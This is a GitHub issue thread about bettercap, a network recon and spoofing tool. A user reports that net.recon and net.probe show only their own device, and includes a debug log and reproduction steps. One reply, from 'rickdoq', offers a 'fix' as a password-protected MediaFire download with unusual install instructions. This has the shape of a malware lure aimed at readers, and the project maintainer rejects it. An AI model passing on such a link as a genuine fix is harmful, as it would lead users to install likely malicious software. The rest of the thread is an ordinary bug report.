### ISSUE TITLE
Not accessing other devices on the network

### ISSUE THREAD

**Issue by LVFK04** [bettercap/bettercap#1124]
*Description of the bug or feature request*

### Environment

Please provide:

* Bettercap version you are using ( `bettercap -version` ).
My version: v2.32.0

* OS version and architecture you are using.
My operative system: Kali Linux running on a virtual machine on an windows

* **Full debug output** while reproducing the issue ( `bettercap -debug ...` ).
 sudo bettercap -debug
bettercap v2.32.0 (built for linux amd64 with go1.22.3) [type 'help' for a list of commands]

172.20.176.0/20 > 172.20.183.87  » [23:33:33] [sys.log] [dbg] arp.spoof arp cache restoration after spoofing enabled
172.20.176.0/20 > 172.20.183.87  » [23:33:33] [sys.log] [dbg] creating capture for 'eth0' with options: {Monitor:false Snaplen:65536 Bufsize:2097152 Promisc:true Timeout:-10ms}
172.20.176.0/20 > 172.20.183.87  » [23:33:33] [sys.log] [dbg] gateway is 172.20.176.1[00:15:5d:27:57:6d]
172.20.176.0/20 > 172.20.183.87  » [23:33:33] [sys.log] [inf] gateway monitor started ...
172.20.176.0/20 > 172.20.183.87  » [23:33:33] [mod.started] events.stream
172.20.176.0/20 > 172.20.183.87  » [23:33:33] [sys.log] [dbg] [gw] ipv4=172.20.176.1(00:15:5d:27:57:6d) ipv6=()
172.20.176.0/20 > 172.20.183.87  » net.recon on
[23:33:38] [mod.started] net.recon
172.20.176.0/20 > 172.20.183.87  » [23:33:38] [sys.log] [dbg] gateway is 172.20.176.1[00:15:5d:27:57:6d]
172.20.176.0/20 > 172.20.183.87  » [23:33:38] [sys.log] [dbg] [gw] ipv4=172.20.176.1(00:15:5d:27:57:6d) ipv6=()
172.20.176.0/20 > 172.20.183.87  » net.probe on
[23:33:41] [sys.log] [dbg] net.probe Throttling packets of 10 ms.
[23:33:41] [mod.started] net.probe
172.20.176.0/20 > 172.20.183.87  » [23:33:41] [sys.log] [dbg] net.probe mdns prober started
172.20.176.0/20 > 172.20.183.87  » [23:33:41] [sys.log] [dbg] net.probe mdns listener started
172.20.176.0/20 > 172.20.183.87  » [23:33:41] [sys.log] [inf] net.probe probing 4096 addresses on 172.20.176.0/20
172.20.176.0/20 > 172.20.183.87  » [23:33:41] [sys.log] [dbg] net.probe sent 88 bytes of MDNS probe
172.20.176.0/20 > 172.20.183.87  » [23:33:41] [sys.log] [dbg] net.probe skipping address 172.20.176.1 from probing.
172.20.176.0/20 > 172.20.183.87  » [23:33:41] [sys.log] [dbg] net.probe got mdns entry for unknown ip 172.20.176.1
172.20.176.0/20 > 172.20.183.87  » [23:33:41] [sys.log] [dbg] net.probe meta for 172.20.176.1: map[mdns:hostname:DESKTOP-10HK9AM.local. mdns:ipv4:172.20.176.1 mdns:ipv6:fe80::306d:6c04:dd27:a201 mdns:name:3\.26\.0\.160-DESKTOP-10HK9AM\.eea464c3-63d9-4f1f-a170-6a50c2588589._nvstream_dbd._tcp.local. mdns:port:47989]
172.20.176.0/20 > 172.20.183.87  » net[23:33:44] [sys.log] [dbg] gateway is 172.20.176.1[00:15:5d:27:57:6d]
172.20.176.0/20 > 172.20.183.87  » net[23:33:44] [sys.log] [dbg] [gw] ipv4=172.20.176.1(00:15:5d:27:57:6d) ipv6=()
172.20.176.0/20 > 172.20.183.87  » net.show

┌───────────────┬───────────────────┬─────────┬───────────────────────┬────────┬───────┬──────────┐
│     IP ▴      │        MAC        │  Name   │        Vendor         │  Sent  │ Recvd │   Seen   │
├───────────────┼───────────────────┼─────────┼───────────────────────┼────────┼───────┼──────────┤
│ 172.20.183.87 │XXXXXXXXXXXXX │ eth0    │ Microsoft Corporation │ 0 B    │ 0 B   │ 23:33:33 │
│ 172.20.176.1  │ XXXXXXXXXXXXX │ gateway │ Microsoft Corporation │ 1.5 kB │ 437 B │ 23:33:33 │
│               │                   │         │                       │        │       │          │
└───────────────┴───────────────────┴─────────┴───────────────────────┴────────┴───────┴──────────┘

↑ 26 kB / ↓ 57 kB / 1277 pkts

172.20.176.0/20 > 172.20.183.87  » [23:33:49] [sys.log] [dbg] gateway is 172.20.176.1[00:15:5d:27:57:6d]
172.20.176.0/20 > 172.20.183.87  » [23:33:49] [sys.log] [dbg] [gw] ipv4=172.20.176.1(00:15:5d:27:57:6d) ipv6=()
172.20.176.0/20 > 172.20.183.87  » net[23:33:54] [sys.log] [dbg] gateway is 172.20.176.1[00:15:5d:27:57:6d]
172.20.176.0/20 > 172.20.183.87  » net[23:33:54] [sys.log] [dbg] [gw] ipv4=172.20.176.1(00:15:5d:27:57:6d) ipv6=()
172.20.176.0/20 > 172.20.183.87  » [23:33:59] [sys.log] [dbg] gateway is 172.20.176.1[00:15:5d:27:57:6d]
172.20.176.0/20 > 172.20.183.87  » [23:33:59] [sys.log] [dbg] [gw] ipv4=172.20.176.1(00:15:5d:27:57:6d) ipv6=()
172.20.176.0/20 > 172.20.183.87  » exit

Stopping modules and cleaning session state ...

### Steps to Reproduce

1. sudo su
2. bettercap
3. net.recon on
4. net.probe on
5. net.show

**Expected behavior:** *What you expected to happen*
A table containing all of the devices that are connected to the network (such as my TV and phone)

**Actual behavior:** *What actually happened*
I only saw my own device in the network. No other

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by evilsocket** [comment]
@rickdoq wtf is this shit?

**Comment by evilsocket** [comment]
duplicate https://github.com/bettercap/bettercap/issues/1123
